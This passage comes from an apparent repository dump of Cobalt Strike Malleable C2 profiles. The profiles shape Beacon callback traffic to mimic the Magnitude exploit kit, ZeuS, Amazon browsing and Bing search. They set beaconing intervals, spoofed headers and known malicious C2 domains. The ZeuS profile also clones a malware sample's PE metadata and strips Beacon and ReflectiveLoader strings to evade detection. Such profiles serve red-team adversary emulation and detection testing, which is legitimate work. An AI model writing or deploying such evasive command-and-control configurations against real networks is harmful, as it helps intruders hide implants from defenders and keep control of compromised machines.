| 
header "Content-Type" "application/octet-stream"; 64 | header "Connection" "close"; 65 | 66 | output { 67 | print; 68 | } 69 | } 70 | } 71 | 72 | -------------------------------------------------------------------------------- /crimeware/magnitude.profile: -------------------------------------------------------------------------------- 1 | # 2 | # Magnitude Exploit Kit traffic profile 3 | # http://malware-traffic-analysis.net/2014/06/17/index.html 4 | # 5 | # Author: @harmj0y 6 | # 7 | set sample_name "Magnitude Exploit Kit"; 8 | 9 | set sleeptime "45000"; # use a ~45s delay between callbacks 10 | set jitter "50"; # throw in a 50% jitter 11 | set maxdns "255"; 12 | set useragent "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"; 13 | 14 | http-get { 15 | 16 | set uri "/themes/index.php"; 17 | 18 | client { 19 | 20 | header "Accept" "image/jpeg, application/*"; 21 | header "Referer" "http://www.bankofbotswana.bw/"; 22 | header "Accept-Encoding" "gzip, deflate"; 23 | 24 | # throw in a known bad malware domain 25 | header "Host" "wilfredcostume.bamoon.com"; 26 | 27 | metadata { 28 | netbios; 29 | parameter "id"; 30 | } 31 | } 32 | 33 | server { 34 | header "Server" "Apache/2.2.17 (Ubuntu)"; 35 | header "X-Powered-By" "PHP/5.3.5-1ubuntu7.8"; 36 | header "Content-Encoding" "gzip"; 37 | header "Content-Type" "text/html"; 38 | 39 | output { 40 | print; 41 | } 42 | } 43 | } 44 | 45 | http-post { 46 | 47 | set uri "/work/1.php"; 48 | 49 | client { 50 | 51 | header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"; 52 | header "Accept-Language" "en-US;q=0.5,en;q=0.3"; 53 | header "Accept-Encoding" "gzip, deflate"; 54 | header "Content-Type" "application/octet-stream"; 55 | 56 | id { 57 | netbiosu; 58 | parameter "sid"; 59 | } 60 | 61 | output { 62 | print; 63 | } 64 | } 65 | 66 | server { 67 | 68 | header "Server" "Apache/2.2.17 (Ubuntu)"; 69 | header "X-Powered-By" 
"PHP/5.3.5-1ubuntu7.8"; 70 | header "Content-Encoding" "gzip"; 71 | header "Content-Type" "text/html"; 72 | 73 | output { 74 | print; 75 | } 76 | } 77 | } 78 | 79 | -------------------------------------------------------------------------------- /crimeware/zeus.profile: -------------------------------------------------------------------------------- 1 | # 2 | # ZeuS Sample Profile 3 | # client - https://malwr.com/analysis/NjIwNTU2ODA2OTUxNDcwNmJiMTMzYzk4YzU4NWQyZDQ/ 4 | # server - http://malware-traffic-analysis.net/2014/04/05/index.html 5 | # 6 | # Author: @harmj0y 7 | # 8 | set sample_name "ZeuS"; 9 | 10 | set sleeptime "30000"; 11 | set jitter "5"; 12 | set maxdns "255"; 13 | set useragent "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)"; 14 | 15 | # Sample from: https://malshare.com/sample.php?action=detail&hash=1da10c6412b79fe8ffcbb5d1901144ee 16 | stage { 17 | # ./peclone 1da10c6412b79fe8ffcbb5d1901144ee 18 | set checksum "0"; 19 | set compile_time "24 Mar 2011 07:36:23"; 20 | set entry_point "93589"; 21 | set rich_header "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; 22 | set stomppe "false"; 23 | 24 | # strings -e l 1da10c6412b79fe8ffcbb5d1901144ee 25 | stringw "nspr4.dll"; 26 | stringw ".tmp"; 27 | stringw "DISPLAY"; 28 | stringw "SeShutdownPrivilege"; 29 | stringw "cGlobal\\%08X%08X%08X"; 30 | stringw "TSeTcbPrivilege"; 31 | stringw ".exe"; 32 | stringw "SOFTWARE\\Microsoft"; 33 | stringw "SysListView32"; 34 | stringw "MDIClient"; 35 | stringw "CiceroUIWndFrame"; 36 | stringw "ConsoleWindowClass"; 37 | stringw "#32768"; 38 | stringw "SysShadow"; 39 | stringw "e.dat"; 40 | stringw "kernel32.dll"; 41 | stringw "\"%s\""; 42 | stringw "\"%s\" %s"; 
43 | stringw "/c \"%s\""; 44 | stringw "ComSpec"; 45 | stringw "S:(ML;;NRNWNX;;;LW)"; 46 | stringw "SeSecurityPrivilege"; 47 | stringw "S:(ML;CIOI;NRNWNX;;;LW)"; 48 | stringw "Global\\"; 49 | stringw "Local\\"; 50 | stringw "%s%08x.%s"; 51 | stringw "%s%08x"; 52 | 53 | # strings 1da10c6412b79fe8ffcbb5d1901144ee 54 | string "del \"%s\""; 55 | string "if exist \"%s\" goto d"; 56 | string "@echo off"; 57 | string "del /F \"%s\""; 58 | 59 | # get rid of some standard Cobalt Strike stuff. 60 | transform-x86 { 61 | strrep "beacon.dll" ""; 62 | strrep "ReflectiveLoader" ""; 63 | } 64 | 65 | transform-x64 { 66 | strrep "beacon.x64.dll" ""; 67 | strrep "ReflectiveLoader" ""; 68 | } 69 | } 70 | 71 | http-get { 72 | 73 | set uri "/metro91/admin/1/ppptp.jpg"; 74 | 75 | client { 76 | 77 | header "Accept" "*/*"; 78 | header "Connection" "Close"; 79 | 80 | # throw in a known/old Zeus C2 domain 81 | header "Host" "mahamaya1ifesciences.com"; 82 | header "Cache-Control" "no-cache"; 83 | 84 | metadata { 85 | base64; 86 | header "Cookie"; 87 | } 88 | } 89 | 90 | server { 91 | header "Server" "nginx/1.0.4"; 92 | header "Content-Type" "text/html"; 93 | header "Connection" "close"; 94 | header "X-Powered-By" "PHP/5.3.8-1~dotdeb.2"; 95 | 96 | output { 97 | print; 98 | } 99 | } 100 | } 101 | 102 | http-post { 103 | 104 | set uri "/metro91/admin/1/secure.php"; 105 | 106 | client { 107 | 108 | header "Accept" "*/*"; 109 | header "Connection" "Keep-Alive"; 110 | 111 | # throw in a known/old Zeus C2 domain 112 | header "Host" "mahamaya1ifesciences.com"; 113 | header "Cache-Control" "no-cache"; 114 | 115 | id { 116 | netbios; 117 | parameter "id"; 118 | } 119 | 120 | output { 121 | print; 122 | } 123 | } 124 | 125 | server { 126 | header "Server" "nginx/1.0.4"; 127 | header "Content-Type" "text/html"; 128 | header "Connection" "close"; 129 | header "X-Powered-By" "PHP/5.3.8-1~dotdeb.2"; 130 | 131 | output { 132 | print; 133 | } 134 | } 135 | } 136 | 137 | 
--------------------------------------------------------------------------------
/normal/amazon.profile:
--------------------------------------------------------------------------------
#
# Amazon browsing traffic profile
#
# Author: @harmj0y
#
# Shapes Beacon traffic to look like an Amazon page request (GET) and an
# XMLHttpRequest POST to www.amazon.com.  Every header and parameter value
# below is a fixed literal, so the same bytes repeat on each transaction.

# 5 s interval with no jitter: callbacks land on a fixed period.
set sleeptime "5000";
set jitter "0";
set maxdns "255";
# IE11 on Windows 7 (NT 6.1) user agent string.
set useragent "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";

http-get {

    # Looks like an Amazon search URI (field-keywords=books).
    set uri "/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books";

    client {

        header "Accept" "*/*";
        header "Host" "www.amazon.com";

        # Transforms apply top to bottom: base64 the metadata, then each prepend
        # wraps the current buffer, so the Cookie value becomes
        #   skin=noskin;session-token=<base64>csm-hit=s-24KU11BB82RZSYGJ3BDK|1419899012996
        # NOTE(review): the append has no leading ";" so csm-hit runs straight
        # into the base64 value -- confirm whether a separator was intended.
        metadata {
            base64;
            prepend "session-token=";
            prepend "skin=noskin;";
            append "csm-hit=s-24KU11BB82RZSYGJ3BDK|1419899012996";
            header "Cookie";
        }
    }

    server {

        # The x-amz-id-* values are static; they do not change per response.
        header "Server" "Server";
        header "x-amz-id-1" "THKUYEZKCKPGY5T42PZT";
        header "x-amz-id-2" "a21yZ2xrNDNtdGRsa212bGV3YW85amZuZW9ydG5rZmRuZ2tmZGl4aHRvNDVpbgo=";
        header "X-Frame-Options" "SAMEORIGIN";
        # NOTE(review): the body below is emitted uncompressed (plain print)
        # while this header advertises gzip; a proxy or sensor that tries to
        # decode the body will see the mismatch.
        header "Content-Encoding" "gzip";

        # Response body is sent as-is.
        output {
            print;
        }
    }
}

http-post {

    set uri "/N4215/adj/amzn.us.sr.aps";

    client {

        header "Accept" "*/*";
        header "Content-Type" "text/xml";
        header "X-Requested-With" "XMLHttpRequest";
        header "Host" "www.amazon.com";

        # Fixed query parameters sent with every POST.
        parameter "sz" "160x600";
        # NOTE(review): the value repeats the parameter name ("oe=oe=ISO-8859-1;");
        # looks like a copy-paste slip -- check against the captured request.
        parameter "oe" "oe=ISO-8859-1;";

        # Session id goes in the "sn" query parameter with no encoding transform.
        id {
            parameter "sn";
        }

        parameter "s" "3717";
        parameter "dc_ref" "http%3A%2F%2Fwww.amazon.com";

        # POST body: base64 of the Beacon output.
        output {
            base64;
            print;
        }
    }

    server {

        # Static response headers, as on the GET side.
        header "Server" "Server";
        header "x-amz-id-1" "THK9YEZJCKPGY5T42OZT";
        header "x-amz-id-2" "a21JZ1xrNDNtdGRsa219bGV3YW85amZuZW9zdG5rZmRuZ2tmZGl4aHRvNDVpbgo=";
        header "X-Frame-Options" "SAMEORIGIN";
        header "x-ua-compatible" "IE=edge";

        # Response body is sent as-is.
        output {
            print;
        }
    }
}

-------------------------------------------------------------------------------- /normal/bingsearch_getonly.profile: -------------------------------------------------------------------------------- 1 | # 2 | # Bing Web Search 3 | # 4 | # Author: @bluscreenofjeff 5 | # 6 | 7 | https-certificate { 8 | set CN "www.bing.com"; 9 | set O "Microsoft Corporation"; 10 | set C "US"; 11 | set L "Redmond"; 12 | set OU "Microsoft IT"; 13 | set ST "WA"; 14 | set validity "365"; 15 | } 16 | 17 | set sleeptime "60000"; 18 | set jitter "20"; 19 | set useragent "Mozilla/5.0 (compatible, MSIE 11, Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"; 20 | set dns_idle "8.8.4.4"; 21 | set maxdns "235"; 22 | 23 | http-get { 24 | 25 | set uri "/search/"; 26 | 27 | client { 28 | 29 | header "Host" "www.bing.com"; 30 | header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"; 31 | header "Cookie" "DUP=Q=GpO1nJpMnam4UllEfmeMdg2&T=283767088&A=1&IG"; 32 | 33 | metadata { 34 | base64url; 35 | parameter "q"; 36 | } 37 | 38 | parameter "go" "Search"; 39 | parameter "qs" "bs"; 40 | parameter "form" "QBRE"; 41 | 42 | 43 | } 44 | 45 | server { 46 | 47 | header "Cache-Control" "private, max-age=0"; 48 | header "Content-Type" "text/html; charset=utf-8"; 49 | header "Vary" "Accept-Encoding"; 50 | header "Server" "Microsoft-IIS/8.5"; 51 | header "Connection" "close"; 52 | 53 | 54 | output { 55 | netbios; 56 | prepend "Bing